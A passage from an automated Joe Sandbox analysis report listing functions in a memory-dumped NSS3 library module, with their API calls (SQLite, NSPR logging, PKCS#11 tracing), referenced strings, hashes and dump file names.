Opcode Fuzzy Hash: acb478f69d9dd4dcf57b6e99cf48e56464ef30c35e8b9a6da44ee5855503d079
Instruction Fuzzy Hash: 6951BFB19011169BDF20CF68E9417AF77B4BB0A709F16102BDD18A7A10D731E954CBE6

Function 6D054C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6D054CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D054CFD
sqlite3_value_text16.NSS3(?), ref: 6D054D44

Strings

invalid, xrefs: 6D054CF1
API call with %s database connection pointer, xrefs: 6D054CF6
another row available, xrefs: 6D054D20
out of memory, xrefs: 6D054C78, 6D054C9E
unknown error, xrefs: 6D054D56
no more rows available, xrefs: 6D054D2E
bad parameter or other API misuse, xrefs: 6D054D05
abort due to ROLLBACK, xrefs: 6D054D27, 6D054D33

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: b341c8a00d54a12a294a0a95b2a5b95bb1d4ec0dc11e42d045b0dcf9ec63435c
Instruction ID: a23640fe5a18bad11e9fa55d6b62ef98e22d4d871ac613542ba28ee02943a164
Opcode Fuzzy Hash: b341c8a00d54a12a294a0a95b2a5b95bb1d4ec0dc11e42d045b0dcf9ec63435c
Instruction Fuzzy Hash: 56313771E18912B7F7054A28AA007F9BBA2B7CA310F454525DC284B259DB61FC7183F3

Function 6CFB2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CFB2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CFB2D07

Part of subcall function 6D0909D0: PR_Now.NSS3 ref: 6D090A22
Part of subcall function 6D0909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D090A35
Part of subcall function 6D0909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D090A66
Part of subcall function 6D0909D0: PR_GetCurrentThread.NSS3 ref: 6D090A70
Part of subcall function 6D0909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D090A9D
Part of subcall function 6D0909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D090AC8
Part of subcall function 6D0909D0: PR_vsmprintf.NSS3(?,?), ref: 6D090AE8
Part of subcall function 6D0909D0: EnterCriticalSection.KERNEL32(?), ref: 6D090B19
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D090B48
Part of subcall function 6D0909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D090C76
Part of subcall function 6D0909D0: PR_LogFlush.NSS3 ref: 6D090C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFB2D22

Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(?), ref: 6D090B88
Part of subcall function 6D0909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D090C5D
Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D090C8D
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090C9C
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(?), ref: 6D090CD1
Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D090CEC
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090CFB
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D090D16
Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D090D26
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090D35
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D090D65
Part of subcall function 6D0909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D090D70
Part of subcall function 6D0909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D090D90
Part of subcall function 6D0909D0: free.MOZGLUE(00000000), ref: 6D090D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFB2D3B

Part of subcall function 6D0909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D090BAB
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090BBA
Part of subcall function 6D0909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D090D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CFB2D54

Part of subcall function 6D0909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D090BCB
Part of subcall function 6D0909D0: EnterCriticalSection.KERNEL32(?), ref: 6D090BDE
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(?), ref: 6D090C16

Strings

ulPinLen = %d, xrefs: 6CFB2D36
slotID = 0x%x, xrefs: 6CFB2D02
pPin = 0x%p, xrefs: 6CFB2D1D
C_InitToken, xrefs: 6CFB2CE7
nm, xrefs: 6CFB2D6C, 6CFB2D9A
pLabel = 0x%p, xrefs: 6CFB2D4F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nm
API String ID: 420000887-3247699114
Opcode ID: 0db8d5f2015278255ec52d1ae2cc96c02b83b8a460c9c8731252c0a58815fc38
Instruction ID: 88eb61d1ec9f6f2951812c79a7d85acc63859fc01f2ac653139be142e553d35f
Opcode Fuzzy Hash: 0db8d5f2015278255ec52d1ae2cc96c02b83b8a460c9c8731252c0a58815fc38
Instruction Fuzzy Hash: 9E21F275504105EFEB14EFB6DC88B5A3BB1EB4A71DF488164FA08E7263CB728944CB61

Function 6CF22450 Relevance: 19.2, APIs: 15, Instructions: 440COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CF224BA
LeaveCriticalSection.KERNEL32(?), ref: 6CF2250D
EnterCriticalSection.KERNEL32(?), ref: 6CF22554
LeaveCriticalSection.KERNEL32(?), ref: 6CF225A7
EnterCriticalSection.KERNEL32(?), ref: 6CF22609
LeaveCriticalSection.KERNEL32(?), ref: 6CF2265F
EnterCriticalSection.KERNEL32(?), ref: 6CF226A2
LeaveCriticalSection.KERNEL32(?), ref: 6CF226F5
EnterCriticalSection.KERNEL32(?), ref: 6CF22764
LeaveCriticalSection.KERNEL32(?), ref: 6CF22898
EnterCriticalSection.KERNEL32(?), ref: 6CF228D0
EnterCriticalSection.KERNEL32(?), ref: 6CF22948
LeaveCriticalSection.KERNEL32(?), ref: 6CF2299B
EnterCriticalSection.KERNEL32(?), ref: 6CF229E2
LeaveCriticalSection.KERNEL32(?), ref: 6CF22A31

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: a4dd8ae1f14fb81b6a38472c2dd8773ef002e34c25083dd813b7f649bb7f6a6c
Instruction ID: 62431fea6b490bec8630f0cfb616302cd154f531c59c9ba08d6808dc9c2590d6
Opcode Fuzzy Hash: a4dd8ae1f14fb81b6a38472c2dd8773ef002e34c25083dd813b7f649bb7f6a6c
Instruction Fuzzy Hash: 37F190329111109FDB089FA0D98DB6E3B31BF4BB25B19012ED94697640CB3EE981CB93

Function 6D052D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6D052D9F

Part of subcall function 6CF0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CF6F9C9,?,6CF6F4DA,6CF6F9C9,?,?,6CF3369A), ref: 6CF0CA7A
Part of subcall function 6CF0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CF0CB26

sqlite3_exec.NSS3(?,?,6D052F70,?,?), ref: 6D052DF9
sqlite3_free.NSS3(00000000), ref: 6D052E2C
sqlite3_free.NSS3(?), ref: 6D052E3A
sqlite3_free.NSS3(?), ref: 6D052E52
sqlite3_mprintf.NSS3(6D0BAAF9,?), ref: 6D052E62
sqlite3_free.NSS3(?), ref: 6D052E70
sqlite3_free.NSS3(?), ref: 6D052E89
sqlite3_free.NSS3(?), ref: 6D052EBB
sqlite3_free.NSS3(?), ref: 6D052ECB
sqlite3_free.NSS3(00000000), ref: 6D052F3E
sqlite3_free.NSS3(?), ref: 6D052F4C

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: cc86026b602ed5b54f65eb76758489d58624d48b4bc710c1a65141a5d8988987
Instruction ID: 01d83ca436da958b01361e99902800ac27bc93b4b7272c2e7608332146bcd9a3
Opcode Fuzzy Hash: cc86026b602ed5b54f65eb76758489d58624d48b4bc710c1a65141a5d8988987
Instruction Fuzzy Hash: F8616DB5E00206CBEB10CF68D990BEEB7F2AF48748F154024DD55A7301E771E964CBA1

Function 6CFA2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CFA3F23,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C62
EnterCriticalSection.KERNEL32(0000001C,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C76
PL_HashTableLookup.NSS3(00000000,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2C93

Part of subcall function 6D02DD70: TlsGetValue.KERNEL32 ref: 6D02DD8C
Part of subcall function 6D02DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D02DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23,?), ref: 6CFA2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?,?,6CFA3F23), ref: 6CFA2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?), ref: 6CFA2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CF9E477,?,?,?,00000001,00000000,?), ref: 6CFA2D4D
EnterCriticalSection.KERNEL32(?), ref: 6CFA2D61
PL_HashTableLookup.NSS3(?,?), ref: 6CFA2D71
PR_Unlock.NSS3(?), ref: 6CFA2D7E

Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707AD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707CD
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF0204A), ref: 6CF707D6
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF0204A), ref: 6CF707E4
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,6CF0204A), ref: 6CF70864
Part of subcall function 6CF707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF70880
Part of subcall function 6CF707A0: TlsSetValue.KERNEL32(00000000,?,?,6CF0204A), ref: 6CF708CB
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708D7
Part of subcall function 6CF707A0: TlsGetValue.KERNEL32(?,?,6CF0204A), ref: 6CF708FB

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 7c94af8933c2aa2d70fc4f082c661b0526bdc4fac7f9431bdb261161bfec41d9
Instruction ID: 3903c12f4d20ff387dc857b6a64142c9e89d4700e6a4e3f46e55023cc89d7646
Opcode Fuzzy Hash: 7c94af8933c2aa2d70fc4f082c661b0526bdc4fac7f9431bdb261161bfec41d9
Instruction Fuzzy Hash: BF5118B6D00604EBEB009F65EC4499AB778FF09318B158521ED1C97B12EB32ED65C7E1

Function 6CF04C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04C97
EnterCriticalSection.KERNEL32(?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04CB0
PR_Unlock.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04D97
PR_Lock.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04DBA
PR_WaitCondVar.NSS3 ref: 6CF04DD4
PR_Unlock.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04DEF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 72305c3683c5ee5c4cf78023810ac0d602e377c0ef738c0efadf74f3fa13a314
Instruction ID: fa5e37dde5fc62e3dc7414d68176249f631628eb181a9231d3bf4803d889fbf8
Opcode Fuzzy Hash: 72305c3683c5ee5c4cf78023810ac0d602e377c0ef738c0efadf74f3fa13a314
Instruction Fuzzy Hash: 20416DB1A05A15CFDB10AF78E494659BBB4BF49714F06866DDC48DB710EB30D880CBD2

Function 6CFB6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CFB6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFB6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFB6CA3

Part of subcall function 6D09D930: PL_strncpyz.NSS3(?,?,?), ref: 6D09D963

PR_LogPrint.NSS3(?,00000000), ref: 6CFB6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CFB6CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6CFB6C9C
C_DigestInit, xrefs: 6CFB6C61
hSession = 0x%x, xrefs: 6CFB6C7E, 6CFB6C8E
pMechanism = 0x%p, xrefs: 6CFB6CD0
nm, xrefs: 6CFB6CF4, 6CFB6D1F

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nm
API String ID: 1003633598-3723360298
Opcode ID: 7ae01b6ec216469dfdf1bed3ba1dc6c090ffa77918bb4d4cdd4d3715ab1780d5
Instruction ID: 153d7549c879fe44d9fd30ec4875ee23e30007459b5ce1e5700de0c11d9ea9c9
Opcode Fuzzy Hash: 7ae01b6ec216469dfdf1bed3ba1dc6c090ffa77918bb4d4cdd4d3715ab1780d5
Instruction Fuzzy Hash: 392137719041099BEB18DB76DD88F5F37B5EB46719F094029F90DEB642DF309908CBA2

Function 6CFCECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CFCDE64), ref: 6CFCED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFCED22

Part of subcall function 6CFDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0B18D0,?), ref: 6CFDB095

PL_FreeArenaPool.NSS3(?), ref: 6CFCED4A
PL_FinishArenaPool.NSS3(?), ref: 6CFCED6B
PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0), ref: 6CFCED38

Part of subcall function 6CF04C70: TlsGetValue.KERNEL32(?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04C97
Part of subcall function 6CF04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04CB0
Part of subcall function 6CF04C70: PR_Unlock.NSS3(?,?,?,?,?,6CF03921,6D0E14E4,6D04CC70), ref: 6CF04CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CFCED52
PR_CallOnce.NSS3(6D0E2AA4,6CFE12D0), ref: 6CFCED83
PL_FreeArenaPool.NSS3(?), ref: 6CFCED95
PL_FinishArenaPool.NSS3(?), ref: 6CFCED9D

Part of subcall function 6CFE64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CFE127C,00000000,00000000,00000000), ref: 6CFE650E

Strings

security, xrefs: 6CFCED06

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 4bb7044959975f0dc1cf9a8ca31ef624e9d5f169fb17497d4fa073be4aa6bf01
Instruction ID: 44d099b98aab7f4d7dad781edbee162f3f876f9e43d6347a68ec8f9e0daa7cd7
Opcode Fuzzy Hash: 4bb7044959975f0dc1cf9a8ca31ef624e9d5f169fb17497d4fa073be4aa6bf01
Instruction Fuzzy Hash: 9E113A76B0020A7BE6205B26AC42BBF7278AF4570CF044539F84562A81FB25A51CC6E7

Function 6CFF4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CFF4DCB

Part of subcall function 6CFE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF887ED,00000800,6CF7EF74,00000000), ref: 6CFE1000
Part of subcall function 6CFE0FF0: PR_NewLock.NSS3(?,00000800,6CF7EF74,00000000), ref: 6CFE1016
Part of subcall function 6CFE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF887ED,00000008,?,00000800,6CF7EF74,00000000), ref: 6CFE102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CFF4DE1

Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE10F3
Part of subcall function 6CFE10C0: EnterCriticalSection.KERNEL32(?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE110C
Part of subcall function 6CFE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1141
Part of subcall function 6CFE10C0: PR_Unlock.NSS3(?,?,?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE1182
Part of subcall function 6CFE10C0: TlsGetValue.KERNEL32(?,6CF88802,00000000,00000008,?,6CF7EF74,00000000), ref: 6CFE119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CFF4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFF4E59

Part of subcall function 6CFDFAB0: free.MOZGLUE(?,-00000001,?,?,6CF7F673,00000000,00000000), ref: 6CFDFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0B300C,00000000), ref: 6CFF4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CFF4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CFF4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFF521A

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: e02b7d5c0b81ef51ecff1d2e5e7ee9a7bda22af7701e37991a3acb56cdd50a56
Instruction ID: 53b0bcc90d501fc218f101ae3f7ea6a380862d435437c26c587034da862207ac
Opcode Fuzzy Hash: e02b7d5c0b81ef51ecff1d2e5e7ee9a7bda22af7701e37991a3acb56cdd50a56
Instruction Fuzzy Hash: 7BF19F71E00206CBEB04CF54D8407AEBBB2FF49358F258169D925AB791E775E982CF90

Function 6CFF0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CFF2C2A), ref: 6CFF0C81

Part of subcall function 6CFDBE30: SECOID_FindOID_Util.NSS3(6CF9311B,00000000,?,6CF9311B,?), ref: 6CFDBE44

Part of subcall function 6CFC8500: SECOID_GetAlgorithmTag_Util.NSS3(6CFC95DC,00000000,00000000,00000000,?,6CFC95DC,00000000,00000000,?,6CFA7F4A,00000000,?,00000000,00000000), ref: 6CFC8517

